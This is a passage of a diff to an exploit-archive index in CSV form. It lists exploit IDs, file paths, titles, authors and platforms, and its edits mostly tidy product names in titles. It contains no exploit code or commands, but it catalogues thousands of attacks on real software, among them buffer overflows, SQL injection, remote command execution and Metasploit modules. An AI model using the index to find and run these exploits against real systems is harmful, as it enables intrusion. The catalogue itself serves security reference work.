Denial of Service",2004-01-24,"Donato Ferrante",windows,dos,0 @@ -21007,10 +21007,10 @@ id,file,description,date,author,platform,type,port 23757,platforms/linux/dos/23757.txt,"Gamespy Software Development Kit - Remote Denial of Service",2004-02-24,"Luigi Auriemma",linux,dos,0 23758,platforms/windows/remote/23758.txt,"GWeb HTTP Server 0.5/0.6 - Directory Traversal",2004-02-24,"Donato Ferrante",windows,remote,0 23759,platforms/linux/local/23759.pl,"MTools 3.9.x - MFormat Privilege Escalation",2004-02-25,"Sebastian Krahmer",linux,local,0 -23760,platforms/windows/dos/23760.pl,"RhinoSoft Serv-U FTP Server 3/4/5 - MDTM Command Time Argument Buffer Overflow (1)",2004-02-26,saintjmf,windows,dos,0 -23761,platforms/windows/dos/23761.c,"RhinoSoft Serv-U FTP Server 3/4/5 - MDTM Command Time Argument Buffer Overflow (2)",2004-02-26,shaun2k2,windows,dos,0 -23762,platforms/windows/dos/23762.c,"RhinoSoft Serv-U FTP Server 3/4/5 - MDTM Command Time Argument Buffer Overflow (3)",2004-02-26,shaun2k2,windows,dos,0 -23763,platforms/windows/remote/23763.c,"RhinoSoft Serv-U FTP Server 3/4/5 - MDTM Command Time Argument Buffer Overflow (4)",2004-02-26,lion,windows,remote,0 +23760,platforms/windows/dos/23760.pl,"RhinoSoft Serv-U FTPd Server 3/4/5 - MDTM Command Time Argument Buffer Overflow (1)",2004-02-26,saintjmf,windows,dos,0 +23761,platforms/windows/dos/23761.c,"RhinoSoft Serv-U FTPd Server 3/4/5 - MDTM Command Time Argument Buffer Overflow (2)",2004-02-26,shaun2k2,windows,dos,0 +23762,platforms/windows/dos/23762.c,"RhinoSoft Serv-U FTPd Server 3/4/5 - MDTM Command Time Argument Buffer Overflow (3)",2004-02-26,shaun2k2,windows,dos,0 +23763,platforms/windows/remote/23763.c,"RhinoSoft Serv-U FTPd Server 3/4/5 - MDTM Command Time Argument Buffer Overflow (4)",2004-02-26,lion,windows,remote,0 23764,platforms/hardware/remote/23764.txt,"Symantec Gateway Security 5400 Series 2.0 - Error Page Cross-Site Scripting",2004-02-26,Soby,hardware,remote,0 23766,platforms/windows/remote/23766.html,"Microsoft Internet Explorer 5/6 - Cross-Domain Event Leakage",2004-02-27,iDefense,windows,remote,0 23767,platforms/php/webapps/23767.txt,"Invision Power Board 1.3 - Multiple Cross-Site Scripting Vulnerabilities",2004-03-01,"Rafel Ivgi The-Insider",php,webapps,0 @@ -21136,7 +21136,7 @@ id,file,description,date,author,platform,type,port 23888,platforms/php/webapps/23888.txt,"MyBB Profile Wii Friend Code - Multiple Vulnerabilities",2013-01-04,Ichi,php,webapps,0 23969,platforms/windows/remote/23969.rb,"IBM Cognos - tm1admsd.exe Overflow (Metasploit)",2013-01-08,Metasploit,windows,remote,0 23890,platforms/cgi/webapps/23890.txt,"Fresh Guest Book 1.0/2.x - HTML Injection",2004-03-29,"koi8-r Shelz",cgi,webapps,0 -23891,platforms/asp/webapps/23891.txt,"Alan Ward A-Cart 2.0 - category.asp catcode Parameter SQL Injection",2004-03-29,"Manuel Lopez",asp,webapps,0 +23891,platforms/asp/webapps/23891.txt,"Alan Ward A-CART 2.0 - category.asp catcode Parameter SQL Injection",2004-03-29,"Manuel Lopez",asp,webapps,0 23892,platforms/linux/local/23892.c,"Systrace 1.x - Local Policy Bypass",2004-03-29,Brad,linux,local,0 23893,platforms/multiple/remote/23893.txt,"WebCT Campus Edition 3.8/4.x - HTML Injection",2004-03-29,"Simon Boulet",multiple,remote,0 23894,platforms/cgi/webapps/23894.txt,"Cloisterblog 1.2.2 - Journal.pl Directory Traversal",2004-03-29,Dotho,cgi,webapps,0 @@ -21321,7 +21321,7 @@ id,file,description,date,author,platform,type,port 24081,platforms/cfm/webapps/24081.txt,"E-Zone Media FuzeTalk 2.0 - AddUser.cfm Administrator Command Execution",2004-05-05,"Stuart Jamieson",cfm,webapps,0 24082,platforms/php/webapps/24082.txt,"Simple Machines Forum 1.0 - Size Tag HTML Injection",2004-05-05,"Cheng Peng Su",php,webapps,0 24083,platforms/php/webapps/24083.txt,"PHPX 3.x - Multiple Cross-Site Scripting Vulnerabilities",2004-05-05,JeiAr,php,webapps,0 -24084,platforms/multiple/remote/24084.py,"Nagios - history.cgi Remote Command Execution",2013-01-13,blasty,multiple,remote,0 +24084,platforms/multiple/remote/24084.py,"Nagios3 - history.cgi Remote Command Execution",2013-01-13,blasty,multiple,remote,0 24086,platforms/php/webapps/24086.txt,"phlyLabs phlyMail Lite 4.03.04 - (go Parameter) Open Redirect",2013-01-13,LiquidWorm,php,webapps,0 24087,platforms/php/webapps/24087.txt,"phlyLabs phlyMail Lite 4.03.04 - Full Path Disclosure / Persistent Cross-Site Scripting",2013-01-13,LiquidWorm,php,webapps,0 24088,platforms/php/webapps/24088.txt,"PHPX 3.x - admin/page.php Cross-Site Request Forgery / Arbitrary Command Execution",2004-05-05,JeiAr,php,webapps,0 @@ -21344,7 +21344,7 @@ id,file,description,date,author,platform,type,port 24105,platforms/linux/remote/24105.txt,"National Science Foundation Squid Proxy 2.3 - Internet Access Control Bypass",2004-05-10,"Nuno Costa",linux,remote,0 24106,platforms/linux/remote/24106.txt,"Open WebMail 1.x/2.x - Remote Command Execution Variant",2004-05-10,Nullbyte,linux,remote,0 24107,platforms/windows/dos/24107.pl,"EMule Web 0.42 Control Panel - Denial of Service",2004-05-10,"Rafel Ivgi The-Insider",windows,dos,0 -24108,platforms/php/webapps/24108.txt,"phpshop 2.0 - SQL Injection",2013-01-14,"By onestree",php,webapps,0 +24108,platforms/php/webapps/24108.txt,"phpShop 2.0 - SQL Injection",2013-01-14,"By onestree",php,webapps,0 24110,platforms/windows/dos/24110.py,"Serva 2.0.0 - DNS Server QueryName Remote Denial of Service",2013-01-14,"Julien Ahrens",windows,dos,0 24111,platforms/windows/dos/24111.py,"Serva 2.0.0 - HTTP Server GET Remote Denial of Service",2013-01-14,"Julien Ahrens",windows,dos,0 24112,platforms/windows/dos/24112.txt,"Microsoft Internet Explorer 6 - XML Parsing Denial of Service",2004-05-10,"Rafel Ivgi The-Insider",windows,dos,0 @@ -21367,7 +21367,7 @@ id,file,description,date,author,platform,type,port 24129,platforms/windows/remote/24129.bat,"Omnicron OmniHTTPd 2.x/3.0 - Get Request Buffer Overflow",2004-04-23,CoolICE,windows,remote,0 24130,platforms/multiple/dos/24130.txt,"ActivePerl 5.x / Larry Wall Perl 5.x - Duplication Operator Integer Overflow",2004-05-18,"Matt Murphy",multiple,dos,0 24131,platforms/php/webapps/24131.txt,"dsm light Web file browser 2.0 - Directory Traversal",2004-05-18,Humberto,php,webapps,0 -24133,platforms/windows/remote/24133.rb,"Freesshd - Authentication Bypass (Metasploit)",2013-01-15,Metasploit,windows,remote,0 +24133,platforms/windows/remote/24133.rb,"FreeSSHD - Authentication Bypass (Metasploit)",2013-01-15,Metasploit,windows,remote,0 24134,platforms/php/webapps/24134.txt,"CMS snews - SQL Injection",2013-01-15,"By onestree",php,webapps,0 24135,platforms/windows/dos/24135.html,"Microsoft Internet Explorer 5.0.1 - CSS Style Sheet Memory Corruption",2004-05-18,henkie_is_leet,windows,dos,0 24136,platforms/linux/remote/24136.txt,"KDE Konqueror 3.x - Embedded Image URI Obfuscation",2004-05-18,"Drew Copley",linux,remote,0 @@ -21561,8 +21561,8 @@ id,file,description,date,author,platform,type,port 24323,platforms/multiple/remote/24323.rb,"Novell eDirectory 8 - Buffer Overflow (Metasploit)",2013-01-24,Metasploit,multiple,remote,0 24324,platforms/php/webapps/24324.txt,"PostNuke 0.72/0.75 Reviews Module - Cross-Site Scripting",2004-07-26,DarkBicho,php,webapps,0 24325,platforms/multiple/remote/24325.html,"Opera Web Browser 7.53 - Location Replace URI Obfuscation",2004-07-27,"bitlance winter",multiple,remote,0 -24326,platforms/cgi/remote/24326.txt,"RiSearch 0.99 - /RiSearch Pro 3.2.6 show.pl Open Proxy Relay",2004-07-27,"Phil Robinson",cgi,remote,0 -24327,platforms/cgi/remote/24327.txt,"RiSearch 0.99 - /RiSearch Pro 3.2.6 show.pl Arbitrary File Access",2004-07-27,"Phil Robinson",cgi,remote,0 +24326,platforms/cgi/remote/24326.txt,"RiSearch 0.99 /RiSearch Pro 3.2.6 - show.pl Open Proxy Relay",2004-07-27,"Phil Robinson",cgi,remote,0 +24327,platforms/cgi/remote/24327.txt,"RiSearch 0.99 /RiSearch Pro 3.2.6 - show.pl Arbitrary File Access",2004-07-27,"Phil Robinson",cgi,remote,0 24328,platforms/windows/remote/24328.txt,"Microsoft Internet Explorer 5.0.1 - Style Tag Comment Memory Corruption",2004-07-08,"Phuong Nguyen",windows,remote,0 24329,platforms/php/webapps/24329.txt,"AntiBoard 0.6/0.7 - antiboard.php Multiple Parameter SQL Injection",2004-07-28,"Josh Gilmour",php,webapps,0 24330,platforms/php/webapps/24330.txt,"AntiBoard 0.6/0.7 - antiboard.php feedback Parameter Cross-Site Scripting",2004-07-28,"Josh Gilmour",php,webapps,0 @@ -22135,8 +22135,8 @@ id,file,description,date,author,platform,type,port 24968,platforms/windows/dos/24968.rb,"Mikrotik Syslog Server for Windows 1.15 - Denial of Service (Metasploit)",2013-04-22,xis_one,windows,dos,514 24969,platforms/php/webapps/24969.txt,"Joomla! Component CiviCRM 4.2.2 - Remote Code Injection",2013-04-22,iskorpitx,php,webapps,0 24942,platforms/php/webapps/24942.txt,"ZAPms 1.41 - SQL Injection",2013-04-09,NoGe,php,webapps,0 -643,platforms/windows/remote/643.c,"SLMail 5.5 - POP3 PASS Remote Buffer Overflow",2004-12-21,"Haroon Rashid Astwat",windows,remote,0 -646,platforms/windows/remote/646.c,"SLMail 5.5 - Remote Buffer Overflow",2004-12-22,"Ivan Ivanovic",windows,remote,0 +643,platforms/windows/remote/643.c,"Seattle Lab Mail (SLMail) 5.5 - POP3 PASS Remote Buffer Overflow",2004-12-21,"Haroon Rashid Astwat",windows,remote,0 +646,platforms/windows/remote/646.c,"Seattle Lab Mail (SLMail) 5.5 - Remote Buffer Overflow",2004-12-22,"Ivan Ivanovic",windows,remote,0 24944,platforms/windows/remote/24944.py,"Freefloat FTP 1.0 - DEP Bypass with ROP",2013-04-10,negux,windows,remote,0 24945,platforms/hardware/remote/24945.rb,"Linksys WRT54GL - apply.cgi Command Execution (Metasploit)",2013-04-10,Metasploit,hardware,remote,0 24946,platforms/multiple/remote/24946.rb,"Adobe ColdFusion APSB13-03 - Remote Exploit (Metasploit)",2013-04-10,Metasploit,multiple,remote,0 @@ -22145,7 +22145,7 @@ id,file,description,date,author,platform,type,port 27435,platforms/php/webapps/27435.txt,"phpMyAdmin 2.8.1 - Set_Theme Cross-Site Scripting",2006-03-16,"Ali Asad",php,webapps,0 27436,platforms/php/webapps/27436.txt,"Invision Power Services Invision Board 2.0.4 - Search Action Multiple Parameter Cross-Site Scripting",2006-03-17,Mr.SNAKE,php,webapps,0 24951,platforms/linux/dos/24951.pl,"ircd-hybrid 8.0.5 - Denial of Service",2013-04-12,kingcope,linux,dos,0 -24952,platforms/windows/dos/24952.py,"AT-TFTP Server 2.0 - Stack Based Buffer Overflow Denial of Service",2013-04-12,xis_one,windows,dos,69 +24952,platforms/windows/dos/24952.py,"Allied Telesyn TFTP (AT-TFTP) Server/Daemon 2.0 - Stack Based Buffer Overflow Denial of Service",2013-04-12,xis_one,windows,dos,69 24953,platforms/php/webapps/24953.txt,"Free Monthly Websites 2.0 - Admin Password Change",2013-04-12,"Yassin Aboukir",php,webapps,0 24954,platforms/php/webapps/24954.txt,"Simple HRM System 2.3 - Multiple Vulnerabilities",2013-04-12,Doraemon,php,webapps,0 24956,platforms/hardware/remote/24956.rb,"D-Link DIR-645 / DIR-815 - diagnostic.php Command Execution (Metasploit)",2013-04-12,Metasploit,hardware,remote,0 @@ -22201,7 +22201,7 @@ id,file,description,date,author,platform,type,port 25194,platforms/windows/remote/25194.txt,"Hosting Controller 1.x/6.1 - Multiple Information Disclosure Vulnerabilities",2005-03-07,"small mouse",windows,remote,0 29277,platforms/windows/remote/29277.txt,"winamp Web interface 7.5.13 - Multiple Vulnerabilities",2006-12-11,"Luigi Auriemma",windows,remote,0 29278,platforms/php/webapps/29278.pl,"Work System eCommerce 3.0.3/3.0.4 - forum.php Remote File Inclusion",2006-12-13,the_Edit0r,php,webapps,0 -24999,platforms/windows/remote/24999.py,"Microsoft Windows Light HTTPD 0.1 - Buffer Overflow",2013-04-25,"Jacob Holcomb",windows,remote,0 +24999,platforms/windows/remote/24999.py,"Light HTTPD 0.1 (Windows) - Buffer Overflow",2013-04-25,"Jacob Holcomb",windows,remote,0 25294,platforms/windows/remote/25294.rb,"Microsoft Internet Explorer - CGenericElement Object Use-After-Free (Metasploit)",2013-05-07,Metasploit,windows,remote,0 25001,platforms/linux/remote/25001.rb,"GroundWork - monarch_scan.cgi OS Command Injection (Metasploit)",2013-04-25,Metasploit,linux,remote,0 25002,platforms/php/webapps/25002.txt,"Hornbill Supportworks ITSM 1.0.0 - SQL Injection",2013-04-25,"Joseph Sheridan",php,webapps,0 @@ -22294,7 +22294,7 @@ id,file,description,date,author,platform,type,port 25088,platforms/php/webapps/25088.txt,"Foe CMS 1.6.5 - Multiple Vulnerabilities",2013-04-29,flux77,php,webapps,0 25092,platforms/windows/remote/25092.txt,"Software602 602 Lan Suite 2004 2004.0.04.1221 - Arbitrary File Upload",2005-02-08,"Tan Chew Keong",windows,remote,0 25093,platforms/php/webapps/25093.txt,"MercuryBoard 1.1 - index.php SQL Injection",2005-02-09,Zeelock,php,webapps,0 -25094,platforms/windows/remote/25094.c,"MSN Messenger 6.2.0137 - '.png' Buffer Overflow",2005-02-08,ATmaCA,windows,remote,0 +25094,platforms/windows/remote/25094.c,"Microsoft MSN Messenger 6.2.0137 - '.png' Buffer Overflow",2005-02-08,ATmaCA,windows,remote,0 25095,platforms/windows/remote/25095.txt,"Microsoft Internet Explorer 5.0.1 - Mouse Event URI Status Bar Obfuscation",2005-02-14,Paul,windows,remote,0 25096,platforms/cgi/webapps/25096.txt,"AWStats 5.x/6.x - Debug Remote Information Disclosure",2005-02-14,GHC,cgi,webapps,0 25097,platforms/php/webapps/25097.txt,"Brooky CubeCart 2.0.1/2.0.4 - ndex.php language Parameter Cross-Site Scripting",2005-02-14,"John Cobb",php,webapps,0 @@ -22463,7 +22463,7 @@ id,file,description,date,author,platform,type,port 25272,platforms/php/webapps/25272.txt,"Dream4 Koobi CMS 4.2.3 - 'index.php' Cross-Site Scripting",2005-03-24,mircia,php,webapps,0 25273,platforms/php/webapps/25273.txt,"Dream4 Koobi CMS 4.2.3 - 'index.php' SQL Injection",2005-03-24,mircia,php,webapps,0 25274,platforms/windows/remote/25274.html,"Maxthon Web Browser 1.2 - Search Bar Information Disclosure",2005-03-25,"Aviv Raff",windows,remote,0 -25275,platforms/linux/remote/25275.c,"Smail-3 - Multiple Remote and Local Vulnerabilities",2005-03-25,infamous42md,linux,remote,0 +25275,platforms/linux/remote/25275.c,"Smail 3 - Multiple Remote and Local Vulnerabilities",2005-03-25,infamous42md,linux,remote,0 25276,platforms/php/webapps/25276.txt,"PHPMyDirectory 10.1.3 - review.php Multiple Parameter Cross-Site Scripting",2005-03-25,mircia,php,webapps,0 25277,platforms/hardware/dos/25277.txt,"Netcomm NB1300 Modem/Router - Remote Denial of Service",2005-03-25,"Chris Rock",hardware,dos,0 25278,platforms/php/webapps/25278.sh,"ESMI PayPal StoreFront 1.7 - pages.php idpages Parameter SQL Injection",2005-03-26,Dcrab,php,webapps,0 @@ -22479,7 +22479,7 @@ id,file,description,date,author,platform,type,port 25288,platforms/linux/local/25288.c,"Linux Kernel 2.4.x / 2.6.x - BlueTooth Signed Buffer Index Privilege Escalation (2)",2005-04-08,qobaiashi,linux,local,0 25289,platforms/linux/local/25289.c,"Linux Kernel 2.4.30 / 2.6.11.5 - BlueTooth 'bluez_sock_create' Privilege Escalation",2005-10-19,backdoored.net,linux,local,0 25291,platforms/multiple/remote/25291.txt,"Tincat Network Library - Remote Buffer Overflow",2005-03-28,"Luigi Auriemma",multiple,remote,0 -25292,platforms/hardware/webapps/25292.txt,"Cisco Linksys E4200 Firmware - Multiple Vulnerabilities",2013-05-07,sqlhacker,hardware,webapps,0 +25292,platforms/hardware/webapps/25292.txt,"Cisco Linksys E4200 - Multiple Vulnerabilities",2013-05-07,sqlhacker,hardware,webapps,0 25775,platforms/linux/remote/25775.rb,"Nginx 1.3.9 < 1.4.0 - Chuncked Encoding Stack Buffer Overflow (Metasploit)",2013-05-28,Metasploit,linux,remote,80 25295,platforms/hardware/dos/25295.txt,"Huawei SNMPv3 Service - Multiple Buffer Overflow Vulnerabilities",2013-05-07,"Roberto Paleari",hardware,dos,0 25296,platforms/windows/local/25296.rb,"AudioCoder - '.m3u' Buffer Overflow (Metasploit)",2013-05-07,Metasploit,windows,local,0 @@ -22580,7 +22580,7 @@ id,file,description,date,author,platform,type,port 25389,platforms/multiple/dos/25389.txt,"Multiple Vendor ICMP Message Handling - Denial of Service",2005-04-12,"Fernando Gont",multiple,dos,0 25390,platforms/asp/webapps/25390.txt,"Comersus Cart 4.0/5.0 - Comersus_Search_Item.asp Cross-Site Scripting",2005-04-12,Lostmon,asp,webapps,0 25391,platforms/multiple/remote/25391.txt,"XAMPP - Phonebook.php Multiple Remote HTML Injection Vulnerabilities",2005-04-12,"Morning Wood",multiple,remote,0 -25392,platforms/linux/remote/25392.c,"Salim Gasmi GLD 1.x - Postfix Greylisting Daemon Buffer Overflow",2005-04-12,Xpl017Elz,linux,remote,0 +25392,platforms/linux/remote/25392.c,"Salim Gasmi GLD (Greylisting Daemon) 1.x - Postfix Greylisting Daemon Buffer Overflow",2005-04-12,Xpl017Elz,linux,remote,0 25393,platforms/multiple/dos/25393.txt,"XAMPP - Insecure Default Password Disclosure",2005-04-12,"Morning Wood",multiple,dos,0 25394,platforms/php/webapps/25394.txt,"Pinnacle Cart - 'index.php' Cross-Site Scripting",2005-04-12,SmOk3,php,webapps,0 25395,platforms/multiple/remote/25395.txt,"Sun JavaMail 1.3.2 - MimeBodyPart.getFileName Directory Traversal",2005-04-12,"Rafael San Miguel Carrasco",multiple,remote,0 @@ -22735,8 +22735,8 @@ id,file,description,date,author,platform,type,port 25549,platforms/php/webapps/25549.txt,"Claroline 1.5/1.6 - toolaccess_details.php tool Parameter Cross-Site Scripting",2005-04-27,"Sieg Fried",php,webapps,0 25550,platforms/php/webapps/25550.txt,"Claroline 1.5/1.6 - user_access_details.php data Parameter Cross-Site Scripting",2005-04-27,"Sieg Fried",php,webapps,0 25551,platforms/php/webapps/25551.txt,"Claroline 1.5/1.6 - myagenda.php coursePath Parameter Cross-Site Scripting",2005-04-27,"Sieg Fried",php,webapps,0 -25552,platforms/php/webapps/25552.txt,"Claroline 1.5/1.6 - userInfo.php Multiple Parameter SQL Injection",2005-04-27,"Sieg Fried",php,webapps,0 -25553,platforms/php/webapps/25553.txt,"Claroline 1.5/1.6 - exercises_details.php exo_id Parameter SQL Injection",2005-04-27,"Sieg Fried",php,webapps,0 +25552,platforms/php/webapps/25552.txt,"Claroline E-Learning 1.5/1.6 - userInfo.php Multiple Parameter SQL Injection",2005-04-27,"Sieg Fried",php,webapps,0 +25553,platforms/php/webapps/25553.txt,"Claroline E-Learning 1.5/1.6 - exercises_details.php exo_id Parameter SQL Injection",2005-04-27,"Sieg Fried",php,webapps,0 25554,platforms/windows/local/25554.c,"Altiris Client 6.0.88 - Service Privilege Escalation",2005-04-27,"Reed Arvin",windows,local,0 25555,platforms/php/webapps/25555.txt,"Dream4 Koobi CMS 4.2.3 - 'index.php' P Parameter SQL Injection",2005-04-27,"CENSORED Search Vulnerabilities",php,webapps,0 25556,platforms/php/webapps/25556.txt,"Dream4 Koobi CMS 4.2.3 - 'index.php' Q Parameter SQL Injection",2005-04-27,"CENSORED Search Vulnerabilities",php,webapps,0 @@ -22751,7 +22751,7 @@ id,file,description,date,author,platform,type,port 25565,platforms/php/webapps/25565.txt,"Just William's Amazon Webstore - searchFor Parameter Cross-Site Scripting",2005-04-28,Lostmon,php,webapps,0 25566,platforms/php/webapps/25566.txt,"Just William's Amazon Webstore - CurrentNumber Parameter Cross-Site Scripting",2005-04-28,Lostmon,php,webapps,0 25567,platforms/php/webapps/25567.txt,"Just William's Amazon Webstore - HTTP Response Splitting",2005-04-28,Lostmon,php,webapps,0 -25568,platforms/php/webapps/25568.txt,"PHPCOIN 1.2 - 'login.php' PHPcoinsessid Parameter SQL Injection",2005-04-28,Dcrab,php,webapps,0 +25568,platforms/php/webapps/25568.txt,"phpCOIN 1.2 - 'login.php' PHPcoinsessid Parameter SQL Injection",2005-04-28,Dcrab,php,webapps,0 25569,platforms/php/webapps/25569.txt,"phpCOIN 1.2 Pages Module - Multiple Parameter SQL Injection",2005-04-28,Dcrab,php,webapps,0 25570,platforms/php/webapps/25570.txt,"JGS-Portal 3.0.1 - ID Variable SQL Injection",2005-04-30,admin@batznet.com,php,webapps,0 25571,platforms/windows/remote/25571.txt,"video cam server 1.0 - Directory Traversal",2005-05-02,"Donato Ferrante",windows,remote,0 @@ -22930,15 +22930,15 @@ id,file,description,date,author,platform,type,port 25739,platforms/jsp/webapps/25739.txt,"BEA WebLogic 7.0/8.1 - Administration Console Error Page Cross-Site Scripting",2005-05-27,"Team SHATTER",jsp,webapps,0 25740,platforms/php/webapps/25740.txt,"JAWS Glossary 0.4/0.5 - Cross-Site Scripting",2005-05-27,Nah,php,webapps,0 25741,platforms/php/webapps/25741.bat,"Invision Power Board 1.x - Unauthorized Access",2005-05-28,V[i]RuS,php,webapps,0 -25742,platforms/php/webapps/25742.txt,"NPDS 4.8 - /5.0 admin.php language Parameter Cross-Site Scripting",2005-05-28,NoSP,php,webapps,0 -25743,platforms/php/webapps/25743.txt,"NPDS 4.8 - /5.0 powerpack_f.php language Parameter Cross-Site Scripting",2005-05-28,NoSP,php,webapps,0 -25744,platforms/php/webapps/25744.txt,"NPDS 4.8 - /5.0 sdv_infos.php sitename Parameter Cross-Site Scripting",2005-05-28,NoSP,php,webapps,0 +25742,platforms/php/webapps/25742.txt,"NPDS 4.8 < 5.0 - admin.php language Parameter Cross-Site Scripting",2005-05-28,NoSP,php,webapps,0 +25743,platforms/php/webapps/25743.txt,"NPDS 4.8 < 5.0 - powerpack_f.php language Parameter Cross-Site Scripting",2005-05-28,NoSP,php,webapps,0 +25744,platforms/php/webapps/25744.txt,"NPDS 4.8 < 5.0 - sdv_infos.php sitename Parameter Cross-Site Scripting",2005-05-28,NoSP,php,webapps,0 25745,platforms/php/webapps/25745.txt,"NPDS 4.8 - /5.0 modules.php Lettre Parameter Cross-Site Scripting",2005-05-28,NoSP,php,webapps,0 -25746,platforms/php/webapps/25746.txt,"NPDS 4.8 - /5.0 reviews.php title Parameter Cross-Site Scripting",2005-05-28,NoSP,php,webapps,0 -25747,platforms/php/webapps/25747.txt,"NPDS 4.8 - /5.0 reply.php image_subject Parameter Cross-Site Scripting",2005-05-28,NoSP,php,webapps,0 -25748,platforms/php/webapps/25748.txt,"NPDS 4.8 - /5.0 Glossaire Module terme Parameter SQL Injection",2005-05-28,NoSP,php,webapps,0 -25749,platforms/php/webapps/25749.txt,"NPDS 4.8 - /5.0 links.php Query Parameter SQL Injection",2005-05-28,NoSP,php,webapps,0 -25750,platforms/php/webapps/25750.txt,"NPDS 4.8 - /5.0 faq.php categories Parameter Cross-Site Scripting",2005-05-28,NoSP,php,webapps,0 +25746,platforms/php/webapps/25746.txt,"NPDS 4.8 < 5.0 - reviews.php title Parameter Cross-Site Scripting",2005-05-28,NoSP,php,webapps,0 +25747,platforms/php/webapps/25747.txt,"NPDS 4.8 < 5.0 - reply.php image_subject Parameter Cross-Site Scripting",2005-05-28,NoSP,php,webapps,0 +25748,platforms/php/webapps/25748.txt,"NPDS 4.8 < 5.0 - Glossaire Module terme Parameter SQL Injection",2005-05-28,NoSP,php,webapps,0 +25749,platforms/php/webapps/25749.txt,"NPDS 4.8 < 5.0 - links.php Query Parameter SQL Injection",2005-05-28,NoSP,php,webapps,0 +25750,platforms/php/webapps/25750.txt,"NPDS 4.8 < 5.0 - faq.php categories Parameter Cross-Site Scripting",2005-05-28,NoSP,php,webapps,0 25751,platforms/asp/webapps/25751.txt,"OS4E - 'login.asp' SQL Injection",2005-05-28,"Dj romty",asp,webapps,0 25752,platforms/php/dos/25752.txt,"PHPMailer 1.7 - Data() Function Remote Denial of Service",2005-05-28,"Mariano Nunez Di Croce",php,dos,0 25753,platforms/asp/webapps/25753.txt,"Hosting Controller 6.1 - resellerresources.asp jresourceid Parameter SQL Injection",2005-05-28,"GrayHatz Security Group",asp,webapps,0 @@ -23131,7 +23131,7 @@ id,file,description,date,author,platform,type,port 25930,platforms/php/webapps/25930.txt,"EasyPHPCalendar 6.1.5/6.2.x - header.inc.php serverPath Parameter Remote File Inclusion",2005-07-04,"Albania Security Clan",php,webapps,0 25931,platforms/php/webapps/25931.txt,"EasyPHPCalendar 6.1.5/6.2.x - datePicker.php serverPath Parameter Remote File Inclusion",2005-07-04,"Albania Security Clan",php,webapps,0 25932,platforms/php/webapps/25932.txt,"EasyPHPCalendar 6.1.5/6.2.x - setupSQL.php serverPath Parameter Remote File Inclusion",2005-07-04,"Albania Security Clan",php,webapps,0 -25933,platforms/windows/remote/25933.txt,"SlimServe httpd 1.0/1.1 - Directory Traversal",2001-03-04,se00020,windows,remote,0 +25933,platforms/windows/remote/25933.txt,"WhitSoft SlimServe httpd 1.0/1.1 - Directory Traversal",2001-03-04,se00020,windows,remote,0 25934,platforms/php/webapps/25934.txt,"Plague News System 0.7 - CID Parameter SQL Injection",2005-07-04,Easyex,php,webapps,0 25935,platforms/php/webapps/25935.txt,"Plague News System 0.7 - CID Parameter Cross-Site Scripting",2005-07-04,Easyex,php,webapps,0 25936,platforms/windows/dos/25936.pl,"PlanetDNS PlanetFileServer - Remote Buffer Overflow",2005-06-28,fRoGGz,windows,dos,0 @@ -23208,7 +23208,7 @@ id,file,description,date,author,platform,type,port 26295,platforms/php/webapps/26295.txt,"PHPMyFAQ 1.5.1 - Multiple Cross-Site Scripting Vulnerabilities",2005-09-23,rgod,php,webapps,0 26296,platforms/php/webapps/26296.txt,"PHPMyFAQ 1.5.1 - Local File Inclusion",2005-08-23,rgod,php,webapps,0 26009,platforms/php/webapps/26009.txt,"AfterLogic WebMail Lite PHP 7.0.1 - Cross-Site Request Forgery",2013-06-07,"Pablo Ribeiro",php,webapps,0 -26010,platforms/windows/dos/26010.py,"Quick TFTP Server 2.2 - Denial of Service",2013-06-07,npn,windows,dos,0 +26010,platforms/windows/dos/26010.py,"Quick TFTP Server Pro 2.2 - Denial of Service",2013-06-07,npn,windows,dos,0 26012,platforms/windows/remote/26012.rb,"Novell Zenworks Mobile Device Managment 2.6.1 / 2.7.0 - Local File Inclusion (Metasploit)",2013-06-07,Metasploit,windows,remote,80 26013,platforms/multiple/remote/26013.txt,"Oracle Forms 6i/9i/4.5.10/5.0/6.0.8/10g Services - Unauthorized Form Execution",2005-07-19,"Alexander Kornbrust",multiple,remote,0 26014,platforms/php/webapps/26014.txt,"FForm Sender 1.0 - Processform.php3 Name Cross-Site Scripting",2005-07-19,rgod,php,webapps,0 @@ -23468,7 +23468,7 @@ id,file,description,date,author,platform,type,port 26267,platforms/php/webapps/26267.txt,"DeluxeBB 1.0 - pm.php uid Parameter SQL Injection",2005-09-15,abducter,php,webapps,0 26268,platforms/php/webapps/26268.txt,"DeluxeBB 1.0 - newpost.php fid Parameter SQL Injection",2005-09-15,abducter,php,webapps,0 26333,platforms/asp/webapps/26333.html,"Aenovo - /Password/default.asp Password Field SQL Injection",2005-10-07,"farhad koosha",asp,webapps,0 -26334,platforms/asp/webapps/26334.txt,"aeNovo - /incs/searchdisplay.asp strSQL Parameter SQL Injection",2005-10-07,"farhad koosha",asp,webapps,0 +26334,platforms/asp/webapps/26334.txt,"Aenovo - /incs/searchdisplay.asp strSQL Parameter SQL Injection",2005-10-07,"farhad koosha",asp,webapps,0 26270,platforms/php/webapps/26270.txt,"Content2Web 1.0.1 - Multiple Input Validation Vulnerabilities",2005-09-16,"Security Tester",php,webapps,0 26271,platforms/osx/dos/26271.txt,"Apple Safari 1.x/2.0.1 - Data URI Memory Corruption",2005-09-17,"Jonathan Rockway",osx,dos,0 26272,platforms/php/webapps/26272.txt,"EPay Pro 2.0 - 'index.php' Directory Traversal",2005-09-19,h4cky0u,php,webapps,0 @@ -23657,7 +23657,7 @@ id,file,description,date,author,platform,type,port 26474,platforms/php/webapps/26474.txt,"PHPFM - Arbitrary File Upload",2005-11-07,rUnViRuS,php,webapps,0 26475,platforms/cgi/webapps/26475.txt,"Asterisk 0.x/1.0/1.2 Voicemail - Unauthorized Access",2005-11-07,"Adam Pointon",cgi,webapps,0 26476,platforms/php/webapps/26476.txt,"OSTE 1.0 - Remote File Inclusion",2005-11-07,khc@bsdmail.org,php,webapps,0 -26477,platforms/php/webapps/26477.txt,"XMB 1.9.3 - u2u.php Cross-Site Scripting",2005-11-07,"HACKERS PAL",php,webapps,0 +26477,platforms/php/webapps/26477.txt,"XMB Forum 1.9.3 - u2u.php Cross-Site Scripting",2005-11-07,"HACKERS PAL",php,webapps,0 26478,platforms/php/webapps/26478.txt,"Invision Power Services Invision Board 2.1 - admin.php Multiple Parameter Cross-Site Scripting",2005-11-07,benjilenoob,php,webapps,0 26479,platforms/windows/local/26479.txt,"Zone Labs Zone Alarm 6.0 - Advance Program Control Bypass",2005-11-07,Tr0y-x,windows,local,0 26480,platforms/php/webapps/26480.txt,"ToendaCMS 0.6.1 - admin.php Directory Traversal",2005-11-07,"Bernhard Mueller",php,webapps,0 @@ -23849,7 +23849,7 